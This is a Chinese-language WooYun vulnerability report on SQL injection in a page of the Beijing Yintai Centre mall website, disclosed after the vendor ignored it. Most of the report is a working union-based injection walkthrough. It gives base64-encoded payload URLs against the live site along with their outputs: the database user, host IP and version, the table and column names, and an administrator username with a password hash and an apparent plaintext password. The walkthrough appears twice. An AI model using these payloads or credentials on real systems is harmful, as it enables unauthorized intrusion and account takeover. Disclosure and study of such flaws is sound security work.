漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110245
漏洞标题:北京银泰中心存在SQL注入
相关厂商:北京银泰中心
漏洞作者: 神秘de路人甲
提交时间:2015-04-27 13:04
修复时间:2015-06-11 13:06
公开时间:2015-06-11 13:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-11: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
北京银泰中心存在SQL注入
详细说明:
http://www.yintai-centre.com/
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjM=
通过base64工具查询得MJM=为23
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjMn
得到You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' limit 1' at line 1
然后进行 order by 编码之后得到order by 9 长度
联合查询:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ==
得到5、7两个显示标识。
查询用户、数据库路径、数据库版本
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcigpLEBAZGF0YWRpcixkYXRhYmFzZSgpLHZlcnNpb24oKSksOCw5
得到:
hdm0570415@223.4.80.80 /data/mysql/ hdm0570415_db 5.1.48-log
列表
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSksOCw5ICBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy
得到数据库hdm0570415_db中的所有表:
act,act_cat,act_cat_en,activity,activity_copy,activity_en,activity_en_copy,admin,admin_en,brand,brand_20130320,brand_en,category,category_en,download,download_en,footer,footer_en,img_index,img_index_en,lb_cat,lb_cat_en,news,news_en,rotate,rotate_en,service,user,user_en,video,video_en,videosed,videosed_en,zl_downl,zl_downl_en,zt_downl,zt_downl_en
列出admin中的所有字段
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpLDgsOSAgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQ==
得到
admin_id,username,passwd,super_admin,lastLogin,session
查询账号密码
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcm5hbWUscGFzc3dkKSw4LDkgIGZyb20gYWRtaW4=
得到
admin 95f66ac1d48930df6b281ea2fe24fc7d (z1Y2_Fr8)
漏洞证明:
http://www.yintai-centre.com/
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjM=
通过base64工具查询得MJM=为23
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjMn
得到You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' limit 1' at line 1
然后进行 order by 编码之后得到order by 9 长度
联合查询:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ==
得到5、7两个显示标识。
查询用户、数据库路径、数据库版本
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcigpLEBAZGF0YWRpcixkYXRhYmFzZSgpLHZlcnNpb24oKSksOCw5
得到:
hdm0570415@223.4.80.80 /data/mysql/ hdm0570415_db 5.1.48-log
列表
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSksOCw5ICBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy
得到数据库hdm0570415_db中的所有表:
act,act_cat,act_cat_en,activity,activity_copy,activity_en,activity_en_copy,admin,admin_en,brand,brand_20130320,brand_en,category,category_en,download,download_en,footer,footer_en,img_index,img_index_en,lb_cat,lb_cat_en,news,news_en,rotate,rotate_en,service,user,user_en,video,video_en,videosed,videosed_en,zl_downl,zl_downl_en,zt_downl,zt_downl_en
列出admin中的所有字段
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpLDgsOSAgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQ==
得到
admin_id,username,passwd,super_admin,lastLogin,session
查询账号密码
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcm5hbWUscGFzc3dkKSw4LDkgIGZyb20gYWRtaW4=
得到
admin 95f66ac1d48930df6b281ea2fe24fc7d (z1Y2_Fr8)
修复方案:
过滤,放狗防注
版权声明:转载请注明来源 神秘de路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)